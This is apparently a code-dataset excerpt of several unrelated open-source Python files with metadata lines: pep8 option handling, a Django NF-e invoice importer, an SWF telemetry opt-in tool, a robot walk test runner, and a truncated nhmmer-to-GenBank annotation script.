""" checks = [] for check, attrs in _checks[argument_name].items(): (codes, args) = attrs if any(not (code and self.ignore_code(code)) for code in codes): checks.append((check.__name__, check, args)) return sorted(checks) def get_parser(prog='pep8', version=__version__): parser = OptionParser(prog=prog, version=version, usage="%prog [options] input ...") parser.config_options = [ 'exclude', 'filename', 'select', 'ignore', 'max-line-length', 'hang-closing', 'count', 'format', 'quiet', 'show-pep8', 'show-source', 'statistics', 'verbose'] parser.add_option('-v', '--verbose', default=0, action='count', help="print status messages, or debug with -vv") parser.add_option('-q', '--quiet', default=0, action='count', help="report only file names, or nothing with -qq") parser.add_option('-r', '--repeat', default=True, action='store_true', help="(obsolete) show all occurrences of the same error") parser.add_option('--first', action='store_false', dest='repeat', help="show first occurrence of each error") parser.add_option('--exclude', metavar='patterns', default=DEFAULT_EXCLUDE, help="exclude files or directories which match these " "comma separated patterns (default: %default)") parser.add_option('--filename', metavar='patterns', default='*.py', help="when parsing directories, only check filenames " "matching these comma separated patterns " "(default: %default)") parser.add_option('--select', metavar='errors', default='', help="select errors and warnings (e.g. E,W6)") parser.add_option('--ignore', metavar='errors', default='', help="skip errors and warnings (e.g. E4,W) " "(default: %s)" % DEFAULT_IGNORE) parser.add_option('--show-source', action='store_true', help="show source code for each error") parser.add_option('--show-pep8', action='store_true', help="show text of PEP 8 for each error " "(implies --first)") parser.add_option('--statistics', action='store_true', help="count errors and warnings") parser.add_option('--count', action='store_true', help="print total number of errors and warnings " "to standard error and set exit code to 1 if " "total is not null") parser.add_option('--max-line-length', type='int', metavar='n', default=MAX_LINE_LENGTH, help="set maximum allowed line length " "(default: %default)") parser.add_option('--hang-closing', action='store_true', help="hang closing bracket instead of matching " "indentation of opening bracket's line") parser.add_option('--format', metavar='format', default='default', help="set the error format [default|pylint|<custom>]") parser.add_option('--diff', action='store_true', help="report only lines changed according to the " "unified diff received on STDIN") group = parser.add_option_group("Testing Options") if os.path.exists(TESTSUITE_PATH): group.add_option('--testsuite', metavar='dir', help="run regression tests from dir") group.add_option('--doctest', action='store_true', help="run doctest on myself") group.add_option('--benchmark', action='store_true', help="measure processing speed") return parser def read_config(options, args, arglist, parser): """Read both user configuration and local configuration.""" config = RawConfigParser() user_conf = options.config if user_conf and os.path.isfile(user_conf): if options.verbose: print('user configuration: %s' % user_conf) config.read(user_conf) local_dir = os.curdir parent = tail = args and os.path.abspath(os.path.commonprefix(args)) while tail: if config.read([os.path.join(parent, fn) for fn in PROJECT_CONFIG]): local_dir = parent if options.verbose: print('local configuration: in %s' % parent) break 
(parent, tail) = os.path.split(parent) pep8_section = parser.prog if config.has_section(pep8_section): option_list = dict([(o.dest, o.type or o.action) for o in parser.option_list]) # First, read the default values (new_options, __) = parser.parse_args([]) # Second, parse the configuration for opt in config.options(pep8_section): if opt.replace('_', '-') not in parser.config_options: print(" unknown option '%s' ignored" % opt) continue if options.verbose > 1: print(" %s = %s" % (opt, config.get(pep8_section, opt))) normalized_opt = opt.replace('-', '_') opt_type = option_list[normalized_opt] if opt_type in ('int', 'count'): value = config.getint(pep8_section, opt) elif opt_type == 'string': value = config.get(pep8_section, opt) if normalized_opt == 'exclude': value = normalize_paths(value, local_dir) else: assert opt_type in ('store_true', 'store_false') value = config.getboolean(pep8_section, opt) setattr(new_options, normalized_opt, value) # Third, overwrite with the command-line options (options, __) = parser.parse_args(arglist, values=new_options) options.doctest = options.testsuite = False return options def process_options(arglist=None, parse_argv=False, config_file=None, parser=None): """Process options passed either via arglist or via command line args.""" if not parser: parser = get_parser() if not parser.has_option('--config'): if config_file is True: config_file = DEFAULT_CONFIG group = parser.add_option_group("Configuration", description=( "The project options are read from the [%s] section of the " "tox.ini file or the setup.cfg file located in any parent folder " "of the path(s) being processed. Allowed options are: %s." % (parser.prog, ', '.join(parser.config_options)))) group.add_option('--config', metavar='path', default=config_file, help="user config file location (default: %default)") # Don't read the command line if the module is used as a library. 
if not arglist and not parse_argv: arglist = [] # If parse_argv is True and arglist is None, arguments are # parsed from the command line (sys.argv) (options, args) = parser.parse_args(arglist) options.reporter = None if options.ensure_value('testsuite', False): args.append(options.testsuite) elif not options.ensure_value('doctest', False): if parse_argv and not args: if options.diff or any(os.path.exists(name) for name in PROJECT_CONFIG): args = ['.'] else: parser.error('input not specified') options = read_config(options, args, arglist, parser) options.reporter = parse_argv and options.quiet == 1 and FileReport options.filename = options.filename and options.filename.split(',') options.exclude = normalize_paths(options.exclude) options.select = options.select and options.select.split(',') options.ignore = options.ignore and options.ignore.split(',') if options.diff: options.reporter = DiffReport stdin = stdin_get_value() options.selected_lines = parse_udiff(stdin, options.filename, args[0]) args = sorted(options.selected_lines) return options, args def _main(): """Parse options and run checks on Python source.""" import signal # Handle "Broken pipe" gracefully try: signal.signal(signal.SIGPIPE, lambda signum, frame: sys.exit(1)) except AttributeError: pass # not supported on Windows pep8style = StyleGuide(parse_argv=True, config_file=True) options = pep8style.options if options.doctest or options.testsuite: from testsuite.support import run_tests report = run_tests(pep8style) else: report = pep8style.check_files() if options.statistics: report.print_statistics() if options.benchmark: report.print_benchmark() if options.testsuite and not options.quiet: report.print_results() if report.total_errors: if options.count: sys.stderr.write(str(report.total_errors) + '\n') sys.exit(1) if __name__ == '__main__': _main()
gpl-3.0
-6,555,471,524,927,298,000
37.790914
79
0.56164
false
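The record above ends with the module's public entry points (Checker, the report classes, StyleGuide, process_options and _main). Below is a minimal sketch of driving those entry points as a library rather than from the command line, assuming the source above is importable as pep8; the checked path is a placeholder:

import pep8  # the module whose source appears in the record above

# StyleGuide(**kwargs) builds options the same way _main() does; extra
# keyword options are merged into the parsed defaults via options.__dict__.
style = pep8.StyleGuide(max_line_length=100)

# check_files() walks files and directories, runs every registered
# physical_line and logical_line check, and returns the active report.
report = style.check_files(['example_module.py'])  # placeholder path

print('total problems:', report.total_errors)
print(report.get_statistics(prefix='E1'))  # per-code tallies from BaseReport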
dudanogueira/microerp
microerp/producao/management/commands/nfe.py
1
6041
# -*- coding: utf-8 -*- from django.core.management.base import BaseCommand from django.contrib.sites.models import Site from cadastro.models import Cidade, Bairro from rh.models import Funcionario, PeriodoTrabalhado, Cargo, Departamento from account.models import User from optparse import make_option import os, csv, datetime from django.utils.encoding import smart_unicode, smart_str from xml.dom import minidom from producao.models import FabricanteFornecedor from producao.models import NotaFiscal class Command(BaseCommand): help = ''' Importa Nota Fiscal ''' args = "--file notafiscal.xml," option_list = BaseCommand.option_list + ( make_option('--file', action='store_true', dest='arquivo', help='Importa uma nota fiscal', ), ) def handle(self, *args, **options): arquivo = options.get('arquivo') if options['arquivo']: f = args[0] try: xmldoc = minidom.parse(f) infNFE = xmldoc.getElementsByTagName('chNFe')[0] idnfe = infNFE.firstChild.nodeValue[22:34] nome_emissor = xmldoc.getElementsByTagName('xNome')[0] nome = nome_emissor.firstChild.nodeValue print "NOME DO EMISSOR: %s" % nome print "ID NOTA FISCAL %s" % idnfe emissor = xmldoc.getElementsByTagName('emit')[0] cnpj_emissor = xmldoc.getElementsByTagName('CNPJ')[0].firstChild.nodeValue # look up the issuing supplier fornecedor, created = FabricanteFornecedor.objects.get_or_create(cnpj=cnpj_emissor) fornecedor.nome = nome fornecedor.save() if created: print "Fornecedor CRIADO: %s" % fornecedor else: print "Fornecedor encontrado: %s" % fornecedor total = xmldoc.getElementsByTagName('total')[0] frete = total.getElementsByTagName('vFrete')[0].firstChild.nodeValue # create the NF-e in the system nfe_sistema, created = NotaFiscal.objects.get_or_create(fabricante_fornecedor=fornecedor, numero=idnfe) nfe_sistema.taxas_diversas = frete nfe_sistema.save() # get the invoice items itens = xmldoc.getElementsByTagName('det') for item in itens: # each invoice item...
codigo_produto = item.getElementsByTagName('cProd')[0].firstChild.nodeValue quantidade = item.getElementsByTagName('qCom')[0].firstChild.nodeValue valor_unitario = item.getElementsByTagName('vUnCom')[0].firstChild.nodeValue print u"ITEM: %s" % codigo_produto print u"Quantidade: %s" % quantidade print u"Valor Unitário: %s" % valor_unitario # taxes try: aliquota_icms = float(item.getElementsByTagName('pICMS')[0].firstChild.nodeValue) except: aliquota_icms = 0 try: aliquota_ipi = float(item.getElementsByTagName('pIPI')[0].firstChild.nodeValue) except: aliquota_ipi = 0 try: aliquota_pis = float(item.getElementsByTagName('pPIS')[0].firstChild.nodeValue) except: aliquota_pis = 0 try: aliquota_cofins = float(item.getElementsByTagName('pCOFINS')[0].firstChild.nodeValue) except: aliquota_cofins = 0 total_impostos = aliquota_ipi + aliquota_icms + aliquota_cofins + aliquota_pis print "Valor %% ICMS: %s" % aliquota_icms print "Valor %% IPI: %s" % aliquota_ipi print "Valor %% COFINS: %s" % aliquota_cofins print "Valor %% PIS: %s" % aliquota_pis print "Incidência de %% impostos: %s" % total_impostos # look up the entry, to avoid two identical entries for the same part number item_lancado, created = nfe_sistema.lancamentocomponente_set.get_or_create(part_number_fornecedor=codigo_produto) # update item_lancado.quantidade = quantidade item_lancado.valor_unitario = valor_unitario item_lancado.impostos = total_impostos # save item_lancado.save() # look it up in the part-number memory automatically item_lancado.busca_part_number_na_memoria() # compute the invoice totals nfe_sistema.calcula_totais_nota() # print everything print "#"*10 print "NOTA %s importada" % nfe_sistema.numero frete = nfe_sistema.taxas_diversas produtos = nfe_sistema.total_com_imposto print "TOTAL DA NOTA: %s (Frete) + %s (Produtos + Impostos)" % (frete, produtos) print "Produtos" for lancamento in nfe_sistema.lancamentocomponente_set.all(): print u"----- PN-FORNECEDOR: %s, QTD: %s VALOR: %s, Impostos: %s%% = TOTAL: %s Unitário (considerando frete proporcional) %s" % (lancamento.part_number_fornecedor, lancamento.quantidade, lancamento.valor_unitario, lancamento.impostos, lancamento.valor_total_com_imposto, lancamento.valor_unitario_final) except FabricanteFornecedor.DoesNotExist: print u"Erro. Não encontrado Fornecedor com este CNPJ" except: raise else: print self.help print self.args
lgpl-3.0
3,257,614,420,050,963,000
45.438462
323
0.549114
false
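The management command in the record above pulls everything it needs out of the NF-e XML with xml.dom.minidom. A small self-contained sketch of the same DOM navigation follows, using an invented, heavily truncated NF-e fragment; real access keys are 44 digits, and only the slice [22:34] that the command treats as the invoice number matters here:

from xml.dom import minidom

# Invented miniature NF-e: a 44-character access key, an issuer block and
# one item block, mimicking the tags the command reads (chNFe, xNome,
# CNPJ, det/cProd/qCom/vUnCom).
chave = '0' * 22 + '000012345678' + '0' * 10
sample = (
    '<nfe><chNFe>%s</chNFe>'
    '<emit><xNome>ACME Ltda</xNome><CNPJ>00111222000133</CNPJ></emit>'
    '<det><prod><cProd>PN-1</cProd><qCom>2.0</qCom><vUnCom>10.5</vUnCom>'
    '</prod></det></nfe>' % chave
)

doc = minidom.parseString(sample)
numero = doc.getElementsByTagName('chNFe')[0].firstChild.nodeValue[22:34]
nome = doc.getElementsByTagName('xNome')[0].firstChild.nodeValue
for det in doc.getElementsByTagName('det'):
    cprod = det.getElementsByTagName('cProd')[0].firstChild.nodeValue
    qtd = float(det.getElementsByTagName('qCom')[0].firstChild.nodeValue)
    print(numero, nome, cprod, qtd)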
shinho/SC2
bin/add-opt-in.py
1
7666
#!/usr/bin/env python # Copyright (c) 2012, Adobe Systems Incorporated # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # * Neither the name of Adobe Systems Incorporated nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS # IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR # PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF # LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING # NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. '''See readme or run with no args for usage''' import os import sys import tempfile import shutil import struct import zlib import hashlib import inspect supportsLZMA = False try: import pylzma supportsLZMA = True except: pass #################################### # Helpers #################################### class stringFile(object): def __init__(self, data): self.data = data def read(self, num=-1): result = self.data[:num] self.data = self.data[num:] return result def close(self): self.data = None def flush(self): pass def consumeSwfTag(f): tagBytes = "" recordHeaderRaw = f.read(2) tagBytes += recordHeaderRaw if recordHeaderRaw == "": raise Exception("Bad SWF: Unexpected end of file") recordHeader = struct.unpack("BB", recordHeaderRaw) tagCode = ((recordHeader[1] & 0xff) << 8) | (recordHeader[0] & 0xff) tagType = (tagCode >> 6) tagLength = tagCode & 0x3f if tagLength == 0x3f: ll = f.read(4) longlength = struct.unpack("BBBB", ll) tagLength = ((longlength[3]&0xff) << 24) | ((longlength[2]&0xff) << 16) | ((longlength[1]&0xff) << 8) | (longlength[0]&0xff) tagBytes += ll tagBytes += f.read(tagLength) return (tagType, tagBytes) def outputInt(o, i): o.write(struct.pack('I', i)) def outputTelemetryTag(o, passwordClear): lengthBytes = 2 # reserve if passwordClear: sha = hashlib.sha256() sha.update(passwordClear) passwordDigest = sha.digest() lengthBytes += len(passwordDigest) # Record header code = 93 if lengthBytes >= 63: o.write(struct.pack('<HI', code << 6 | 0x3f, lengthBytes)) else: o.write(struct.pack('<H', code << 6 | lengthBytes)) # Reserve o.write(struct.pack('<H', 0)) # Password if passwordClear: o.write(passwordDigest) #################################### # main() #################################### if __name__ == "__main__": #################################### # Parse command line #################################### if len(sys.argv) < 2: print("Usage: %s SWF_FILE [PASSWORD]" % os.path.basename(inspect.getfile(inspect.currentframe()))) 
print("\nIf PASSWORD is provided, then a password will be required to view advanced telemetry in Adobe 'Monocle'.") sys.exit(-1) infile = sys.argv[1] passwordClear = sys.argv[2] if len(sys.argv) >= 3 else None #################################### # Process SWF header #################################### swfFH = open(infile, 'rb') signature = swfFH.read(3) swfVersion = swfFH.read(1) struct.unpack("<I", swfFH.read(4))[0] # uncompressed length of file if signature == "FWS": pass elif signature == "CWS": decompressedFH = stringFile(zlib.decompressobj().decompress(swfFH.read())) swfFH.close() swfFH = decompressedFH elif signature == "ZWS": if not supportsLZMA: raise Exception("You need the PyLZMA package to use this script on \ LZMA-compressed SWFs. http://www.joachim-bauch.de/projects/pylzma/") swfFH.read(4) # compressed length decompressedFH = stringFile(pylzma.decompress(swfFH.read())) swfFH.close() swfFH = decompressedFH else: raise Exception("Bad SWF: Unrecognized signature: %s" % signature) f = swfFH o = tempfile.TemporaryFile() o.write(signature) o.write(swfVersion) outputInt(o, 0) # FileLength - we'll fix this up later # FrameSize - this is nasty to read because its size can vary rs = f.read(1) r = struct.unpack("B", rs) rbits = (r[0] & 0xff) >> 3 rrbytes = (7 + (rbits*4) - 3) / 8; o.write(rs) o.write(f.read((int)(rrbytes))) o.write(f.read(4)) # FrameRate and FrameCount #################################### # Process each SWF tag #################################### while True: (tagType, tagBytes) = consumeSwfTag(f) if tagType == 93: raise Exception("Bad SWF: already has EnableTelemetry tag") elif tagType == 92: raise Exception("Bad SWF: Signed SWFs are not supported") elif tagType == 69: # FileAttributes tag o.write(tagBytes) # Look ahead for Metadata tag. If present, put our tag after it (nextTagType, nextTagBytes) = consumeSwfTag(f) writeAfterNextTag = nextTagType == 77 if writeAfterNextTag: o.write(nextTagBytes) outputTelemetryTag(o, passwordClear) # If there was no Metadata tag, we still need to write that tag out if not writeAfterNextTag: o.write(nextTagBytes) (tagType, tagBytes) = consumeSwfTag(f) o.write(tagBytes) if tagType == 0: break #################################### # Finish up #################################### # Fix the FileLength header uncompressedLength = o.tell() o.seek(4) o.write(struct.pack("I", uncompressedLength)) o.flush() o.seek(0) # Copy the temp file to the outFile, compressing if necessary outFile = open(infile, "wb") if signature == "FWS": shutil.copyfileobj(o, outFile) else: outFile.write(o.read(8)) # File is compressed after header if signature == "CWS": outFile.write(zlib.compress(o.read())) elif signature == "ZWS": compressed = pylzma.compress(o.read()) outputInt(outFile, len(compressed)-5) # LZMA SWF has CompressedLength header field outFile.write(compressed) else: assert(false) outFile.close() if passwordClear: print("Added opt-in flag with encrypted password " + passwordClear) else: print("Added opt-in flag with no password")
gpl-3.0
1,561,226,999,871,632,100
30.941667
132
0.594834
false
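add-opt-in.py above hand-rolls SWF RECORDHEADERs: the tag code and body length share a little-endian uint16, and bodies of 0x3f bytes or more escape to a long form with an extra uint32 length. A sketch of just that encoding, mirroring outputTelemetryTag() in the record above (tag code 93 is the EnableTelemetry tag it injects):

import struct

def record_header(code, length):
    # Short form: code in the high 10 bits, length in the low 6.
    if length < 0x3f:
        return struct.pack('<H', (code << 6) | length)
    # Long form: low 6 bits all set, true length follows as uint32.
    return struct.pack('<HI', (code << 6) | 0x3f, length)

print(record_header(93, 2).hex())       # reserve field only, no password
print(record_header(93, 2 + 32).hex())  # reserve + sha256 password digest
print(record_header(93, 100).hex())     # forced long form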
aguirrea/lucy
tests/testBalieroWalk.py
1
2371
#! /usr/bin/env python # -*- coding: utf-8 -*- # Andrés Aguirre Dorelo # MINA/INCO/UDELAR # # Execution of individuals resulting from the Baliero and Pias work # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA import glob import os import sys import time from configuration.LoadSystemConfiguration import LoadSystemConfiguration from datatypes.DTIndividualGeneticMaterial import DTIndividualGeneticTimeSerieFile, DTIndividualGeneticMatrix from datatypes.DTIndividualProperty import DTIndividualPropertyBaliero, DTIndividualPropertyPhysicalBioloid from Individual import Individual balieroProp = DTIndividualPropertyBaliero() physicalProp = DTIndividualPropertyPhysicalBioloid() conf = LoadSystemConfiguration() BalieroDir = os.getcwd()+conf.getDirectory("Baliero transformed walk Files") arguments = len(sys.argv) def createIndividual(filename): if int(conf.getProperty("Lucy simulated?"))==1: walk = Individual(balieroProp, DTIndividualGeneticTimeSerieFile(os.getcwd()+"/"+filename)) else: walk = Individual(physicalProp, DTIndividualGeneticTimeSerieFile(os.getcwd()+"/"+filename)) return walk walk = Individual(balieroProp, DTIndividualGeneticMatrix()) # dummy individual to initialise the simulator and enable the time step configuration walk.execute() print "please set the proper time step in vrep" time.sleep(5) if arguments > 1: files = sys.argv[1:] for filename in files: print 'executing individual: ' + filename walk = createIndividual(filename) walk.execute() else: for filename in glob.glob(os.path.join(BalieroDir, '*.xml')): print 'executing individual: ' + filename walk = createIndividual(filename) walk.execute()
gpl-3.0
1,704,087,821,725,901,800
36.03125
144
0.745992
false
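For reference, the harness above runs in two modes; the invocations below are hypothetical (file names are placeholders):

# python testBalieroWalk.py walk_01.xml walk_02.xml   -- run the listed individuals
# python testBalieroWalk.py                           -- sweep the configured Baliero directory for *.xml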
nikolaichik/SigmoID
Python/RepeatGen.py
1
23652
import sys import argparse from time import process_time import Bio from Bio.SeqFeature import FeatureLocation from Bio.SeqFeature import SeqFeature from decimal import * class MySeqFeature(SeqFeature): def __str__(self): out = "type: %s\n" % self.type if self.strand == 1: out += "location: [%s:%s](%s)\n" % (self.location.start+1, self.location.end, '+') if self.strand == -1: out += "location: [%s:%s](%s)\n" % (self.location.start+1, self.location.end, '-') if self.id and self.id != "<unknown id>": out += "id: %s\n" % self.id out += "qualifiers:\n" for qual_key in sorted(self.qualifiers): out += " Key: %s, Value: %s\n" % (qual_key, self.qualifiers[qual_key]) if Bio.__version__ != '1.68': # to avoid problems with diff biopython versions if not hasattr(self, "_sub_features"): self._sub_features = [] if len(self._sub_features) != 0: out += "Sub-Features\n" for sub_feature in self._sub_features: out += "%s\n" % sub_feature return out def is_within_feature(list_of_features, index, some_hit): # 'index' is for feature's index within 'list_of_features' if (list_of_features[index].location.start < some_hit.location.start < list_of_features[index].location.end or list_of_features[index].location.start < some_hit.location.end < list_of_features[index].location.end) or \ (list_of_features[index].location.start < some_hit.location.start < some_hit.location.end < list_of_features[index+1].location.start and \ list_of_features[index].strand == +1 and \ list_of_features[index].strand != list_of_features[index+1].strand): # checking if hit is within other features or is between two convergent ones. return True else: return False def is_within_boundary(list_of_features, index, some_hit): for feature in list_of_features[index:]: if (feature.location.start - list_of_features[index].location.end) < (enter.boundary+1): if (list_of_features[index].location.start+enter.boundary > \ some_hit.location.end > \ list_of_features[index].location.start and \ list_of_features[index].strand == +1) or \ (list_of_features[index].location.end-enter.boundary < \ some_hit.location.start < \ list_of_features[index].location.end and \ list_of_features[index].strand == -1): return True else: return False else: return False def qualifiers_function(qualifiers, var): qual_var = [] for some_qualifier in qualifiers: if any(symbol == '#' for symbol in some_qualifier): qual_var.append(some_qualifier.split('#')) else: sys.exit('Please check your general qualifiers typing') for number in range(len(qual_var)): value_list = [] for index in range(len(qual_var)): if qual_var[number][0] == qual_var[index][0] and \ qual_var[index][1] not in value_list: value_list.append(qual_var[index][1]) var[qual_var[number][0]] = value_list return var def nhmm_parser(path_to_file, max_model_length): x = [] try: a = open(path_to_file, 'r') except IOError: sys.exit('Open error! 
Please check your nhmmer report input file!') r = a.readlines() b = [] d = [] e = [] for index in range(len(r)): d.append([]) if not r[index].startswith('#') or r[index].startswith('\n'): item = r[index].split(' ') if len(item) >= 2: for part in item: if part != '' and len(part) != 0: part = part.replace('\n', '') d[index].append(part) for index in range(len(d)): if len(d[index]) != 0: b.append(d[index]) for index in range(len(b)): if len(b[index]) <= 10: for number in range(len(b[index])): b[index+1].insert(number, b[index][number]) for index in range(len(b)): if len(b[index]) > 10: e.append(b[index]) for item in e: for num_of_spaces in range(len(e[0])): # to avoid problems with additional spaces... e[0] - firstly \ # splitted string by ' ' try: x.append([item[8+num_of_spaces], item[9+num_of_spaces], int(item[11+num_of_spaces]+'1'), float(item[12+num_of_spaces]), float(item[13+num_of_spaces]), item[0+num_of_spaces], item[1+num_of_spaces], int(item[4+num_of_spaces]), int(item[5+num_of_spaces]), int(item[6+num_of_spaces]), int(item[7+num_of_spaces]) ]) if max_model_length is False: max_model_length = int(item[5+num_of_spaces]) elif max_model_length is not False and \ int(item[5+num_of_spaces]) > max_model_length: max_model_length = int(item[5+num_of_spaces]) else: pass except ValueError: pass else: break return [x, max_model_length] def nhmm_prog(path_to_file, e): a = open(path_to_file, 'r') r = a.readlines() prog_list = [] for prog_line in r: if prog_line.startswith('# Program:') or \ prog_line.startswith('# Version:'): prog_list.append(prog_line) prog_list = [item.split(' ') for item in prog_list] for item in prog_list: for piece in item: if piece != '': e.append(piece) return def sorting_output_features(lst): bit_score_list = [] for some_feature in lst: for key in some_feature.qualifiers.keys(): if key == 'note': temp = some_feature.qualifiers[key] temp = temp.split(' ') bit_score_list.append(float(temp[-3])) return bit_score_list def score_parser(some_feature): for key in some_feature.qualifiers.keys(): if key == 'note' and type(some_feature.qualifiers['note']) != list: temp = some_feature.qualifiers[key] temp = temp.split(' ') bit_score = float(temp[-3]) return bit_score elif key == 'note' and type(some_feature.qualifiers['note']) == list: for note in some_feature.qualifiers['note']: if note.startswith('nhmmer'): temp = note temp = temp.split(' ') bit_score = float(temp[-3]) return bit_score def output(score_list, output_features): for val in score_list: for some_feature in output_features: if val == feature_score(some_feature): print (some_feature) output_features = [f for f in output_features if f != some_feature] def feature_score(some_feature): for key in some_feature.qualifiers.keys(): if key == 'note' and type(some_feature.qualifiers[key]) != []: temp = some_feature.qualifiers[key] temp = temp.split(' ') return float(temp[-3]) def dna_topology(path, topo_list): # This function deals with with DNA topology problem in biopython # for more detail: https://github.com/biopython/biopython/issues/363 infile = open(path, 'r') loci_counter = -1 # because 1 is 0 in python lines = infile.readlines() for numline in range(len(lines)): if lines[numline].startswith('LOCUS'): loci_counter += 1 lines[numline] = topo_list[loci_counter] infile.close() return lines def createparser(): parser = argparse.ArgumentParser( prog='RepeatGen', usage='\n%(prog)s <report_file> <input_file> <output_file> [options]', description='''This script allows to add features to a genbank \ file according to nhmmer 
results.\ Requires Biopython 1.64 (or newer)''', epilog='(c) Aliaksandr Damienikan, 2018.') parser.add_argument('report_file', help='path to nhmmer report file produced with \ -tblout option.') parser.add_argument('input_file', help='path to input Genbank file.') parser.add_argument('output_file', help='path to output Genbank file.') parser.add_argument('-L', '--length', default=False, help='annotate features of specified length (range of lengths).', metavar='<int>/<int:int>', required=False, type=str) parser.add_argument('-q', '--qual', default='', metavar='<key#"value">', nargs='*', dest='qual', help='''add this qualifier to each annotated \ feature.''') parser.add_argument('-p', '--palindromic', action='store_const', const=True, default=False, help='''filter palindromic repeats.''') parser.add_argument('-E', '--eval', default=False, type=float, metavar='<float or integer>', help='''threshold E-Value.''') parser.add_argument('-S', '--score', default=False, type=float, metavar='<float or integer>', help='''threshold Bit Score.''') parser.add_argument('-c', '--coverage', default=0.5, type=float, metavar='<float>', help='''minimal coverage for input model (default is 0.5)''') parser.add_argument('-i', '--insert', action='store_const', const=True, default=False, help='''don't add features inside CDS.''') parser.add_argument('-a', '--alilen', type=int, default=False, metavar='<integer>', help='''set profile alignment length (the largest hmm_to if not specified).''') parser.add_argument('-b', '--boundary', type=int, default=0, metavar='<integer>', help='''set allowed length boundary for hits being within features.''') parser.add_argument('-d', '--duplicate', action='store_const', const=True, default=False, help='''no duplicate features with the same location \ and the same rpt_family qualifier value.''') parser.add_argument('-v', '--version', action='version', version='%(prog)s 1.3 (April 6, 2021)') parser.add_argument('-f', '--feature', metavar='<"feature key">', default='unknown type', help='''feature key to add (promoter, protein_bind \ etc.)''') return parser t_start = process_time() args = createparser() enter = args.parse_args() arguments = sys.argv[1:0] max_eval = enter.eval if enter.length is not False: enter.length = enter.length.split(':') if len(enter.length) == 1: enter.min_length = False enter.max_length = int(enter.length[0]) else: enter.min_length = int(enter.length[0]) enter.max_length = int(enter.length[1]) if not 0 <= enter.coverage <= 1: sys.exit('Coverage value is invalid, please specify values in 0.0-1.0 range') try: from Bio import SeqIO except ImportError: sys.exit('\nYou have no Biopython module installed!\n\ You can download it here for free: \ http://biopython.org/wiki/Download\n') try: input_handle = open(enter.input_file, 'r') except IOError: sys.exit('Open error! Please check your genbank input file!') circular_vs_linear = [] for line in input_handle.readlines(): if line.startswith('LOCUS'): circular_vs_linear.append(line) input_handle.close() input_handle = open(enter.input_file, 'r') if enter.input_file == enter.output_file: sys.exit('Sorry, but we can\'t edit input file. Plese give another name \ to output file!') try: output_handle = open(enter.output_file, 'w') except IOError: sys.exit('Open error! 
Please check your genbank output path!') print ('\nRepeatGen 1.0 (January 6, 2018)') print ("="*50) print ('Options used:\n') for arg in range(1, len(sys.argv)): print (sys.argv[arg]) file_path = enter.report_file qualifier = {'CHECK': 'CHECKED!'} qualifiers_function(enter.qual, qualifier) prog = [] maxlen = 0 parser_result = nhmm_parser(file_path, maxlen) allign_list = parser_result[0] if enter.alilen is False: model_length = parser_result[1] # if allignment length is not specified, maximal observed hmm_to is used else: model_length = enter.alilen nhmm_prog(file_path, prog) prog[2] = prog[2].replace('\r', '') records = SeqIO.parse(input_handle, 'genbank') allowed_types = ['CDS', 'ncRNA', 'sRNA', 'tRNA', 'misc_RNA'] total = 0 for record in records: print ('\n' + "-"*50 + "\nCONTIG: " + record.id) print ('\n FEATURES ADDED: \n') allowed_features_list = [] for feature in record.features: if feature.type in allowed_types: allowed_features_list.append(feature) try: cds_loc_start = allowed_features_list[0] except: cds_loc_start = record.features[0] try: cds_loc_end = allowed_features_list[-1] except: cds_loc_end = record.features[-1] for allign in allign_list: from Bio import SeqFeature if allign[2] == +1: env_start = int(allign[0]) #env_from env_end = int(allign[1]) #env_to strnd = int(allign[2]) e_value = float(allign[3]) score = allign[4] locus = allign[5] version = allign[6] hmm_from = allign[7] hmm_to = allign[8] hmm_diff = hmm_to - hmm_from getcontext().prec = 4 hmm_coverage = Decimal((hmm_diff+1))/Decimal(model_length) ali_start = allign[9] ali_end = allign[10] ali_diff = ali_end - ali_start else: env_start = int(allign[1]) #env_to env_end = int(allign[0]) #env_from strnd = int(allign[2]) e_value = float(allign[3]) score = allign[4] locus = allign[5] version = allign[6] hmm_from = allign[7] hmm_to = allign[8] hmm_diff = hmm_to - hmm_from getcontext().prec = 4 hmm_coverage = Decimal((hmm_diff+1))/Decimal(model_length) ali_start = allign[10] ali_end = allign[9] ali_diff = ali_end - ali_start start_pos = SeqFeature.ExactPosition(env_start-1) end_pos = SeqFeature.ExactPosition(env_end) feature_length = env_end - (env_start-1) feature_location = FeatureLocation(start_pos, end_pos) feature_type = enter.feature from Bio.SeqFeature import SeqFeature note_qualifier = dict() note_qualifier['note'] = str('%s score %s E-value %s' % (prog[2].replace('\n', ''), score, e_value)) my_feature = MySeqFeature( location=feature_location, type=feature_type, strand=strnd, qualifiers=dict(list(qualifier.items()) + list(note_qualifier.items()))) if Decimal(hmm_coverage) >= Decimal(enter.coverage) and \ ( (enter.min_length != 0 and enter.min_length <= feature_length <= enter.max_length) or \ (enter.min_length == False and feature_length == enter.max_length) 